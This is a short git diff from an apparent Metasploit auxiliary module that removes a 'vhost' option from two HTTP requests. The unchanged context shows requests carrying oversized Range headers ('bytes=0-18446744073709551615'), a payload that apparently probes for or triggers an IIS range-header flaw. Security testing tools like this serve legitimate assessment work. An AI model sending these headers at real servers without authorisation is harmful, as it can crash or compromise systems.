No "vhost"
parent
3aa8e6908d
commit
90ed6ee0b6
|
@ -67,7 +67,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
req = cli.request_raw({
|
req = cli.request_raw({
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'vhost' => 'stuff',
|
|
||||||
'headers' => {
|
'headers' => {
|
||||||
'Range' => 'bytes=18-18446744073709551615'
|
'Range' => 'bytes=18-18446744073709551615'
|
||||||
}
|
}
|
||||||
|
@ -102,7 +101,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
res = send_request_raw({
|
res = send_request_raw({
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'vhost' => 'stuff',
|
|
||||||
'headers' => {
|
'headers' => {
|
||||||
'Range' => 'bytes=0-18446744073709551615'
|
'Range' => 'bytes=0-18446744073709551615'
|
||||||
}
|
}
|
||||||
|
|
Loading…
Reference in New Issue